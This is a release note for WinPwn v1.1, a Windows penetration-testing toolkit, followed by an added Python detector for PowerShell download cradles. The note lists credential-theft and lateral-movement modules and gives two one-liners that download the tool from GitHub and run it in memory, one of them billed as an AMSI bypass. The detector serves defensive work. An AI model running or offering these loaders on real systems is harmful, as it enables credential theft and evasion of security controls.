
WinPwn v1.1 Automation for internal Windows Penetration Testing


itsMe


Automation for internal Windows Penetration Testing.

    1) Automatic Proxy Detection
    2) Elevated or unelevated Detection
    3) Forensic Mode or Pentest Mode
        a. Forensics -> Loki + PSRECON + Todo: Threat hunting functions
        b. Pentest -> Internal Windows Domain System
            i. Inveigh NBNS/SMB/HTTPS Spoofing
            ii. Local Recon -> Hostenum, SessionGopher, FileSearch, PSRecon
            iii. Domain Recon -> GetExploitableSystems, Powerview functions, ACL-Analysis, ADRecon
                1) Todo: Grouper for Group Policy overview
            iv. Privilege Escalation -> Powersploit (Allchecks), GPP-Passwords, MS-Exploit Search (Sherlock), WCMDump, JAWS
            v. Lazagne Password recovery
            vi. Exploitation -> Kerberoasting, Mimikittenz, Mimikatz with Admin-rights
            vii. LateralMovement -> FindLocalAdminAccess
                1) Invoke-MassMimikatz || Powershell Empire Remote Launcher Execution over WMI
                2) DomainPasswordspray
            viii. Share Enumeration
            ix. FindGPOLocation -> Search for user/group rights
            x. Find-Fruit

Changelog v1.1

This version contains mainly new features: the execution of various C# binaries in memory, GPO audit functions, various new local recon checks, and domain checks.

Just import the modules with: Import-Module .\WinPwn.ps1 or iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn.ps1')

For AMSI Bypass use the following one-liner: iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/ObfusWinPwn.ps1')
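
For defenders, the two remote-load one-liners above share one shape: a `Net.WebClient` `DownloadString` call whose result is passed to `iex`, so the script never touches disk. The following is an added example, not part of the original post or the WinPwn project, that flags that shape in PowerShell script block logging (Event ID 4104) text. It assumes the events were already exported as (record id, ScriptBlockText) pairs; the function names, record ids and sample events are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# PowerShell's tokenizer accepts typographic quotes as string delimiters, so a
# one-liner pasted from a web page runs as-is; fold them to ASCII before matching.
QUOTE_FOLD = str.maketrans({"\u2018": "'", "\u2019": "'", "\u201a": "'", "\u201b": "'",
                            "\u201c": '"', "\u201d": '"', "\u201e": '"'})

WEBCLIENT = re.compile(r"new-object\s+(?:system\.)?net\.webclient", re.I)
FETCH = re.compile(r"\.\s*downloadstring\s*\(\s*['\"]([^'\"]+)['\"]", re.I)
EXECUTE = re.compile(r"(?<![\w-])(?:iex|invoke-expression)(?![\w-])", re.I)


def find_cradle(script_block_text):
    """Return details of a fetch-and-execute cradle in one script block, else None."""
    text = re.sub(r"\s+", " ", script_block_text.translate(QUOTE_FOLD))
    fetch = FETCH.search(text)
    if not (fetch and WEBCLIENT.search(text) and EXECUTE.search(text)):
        return None
    url = fetch.group(1)
    return {"url": url,
            "host": urlparse(url).hostname,
            "script": urlparse(url).path.rsplit("/", 1)[-1]}


def scan(events):
    """events: iterable of (record_id, ScriptBlockText) pairs from Event ID 4104."""
    hits = []
    for record_id, text in events:
        finding = find_cradle(text)
        if finding:
            hits.append({"record_id": record_id, **finding})
    return hits


# Constructed sample events (not real logs); record ids are made up.
SAMPLE_EVENTS = [
    (101, "iex (new-object net.webclient).downloadstring(\u2018https://raw.githubusercontent.com/"
          "SecureThisShit/WinPwn/master/WinPwn.ps1\u2019)"),
    (102, "Invoke-Expression  (New-Object System.Net.WebClient).DownloadString("
          "'https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/ObfusWinPwn.ps1')"),
    (103, "Import-Module .\\WinPwn.ps1"),
    (104, "(New-Object Net.WebClient).DownloadFile('https://example.com/setup.msi', 'C:\\Temp\\setup.msi')"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Records 103 and 104 are deliberately not flagged: a local `Import-Module` involves no network fetch and the `DownloadFile` call is never executed in memory, so both need separate rules.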
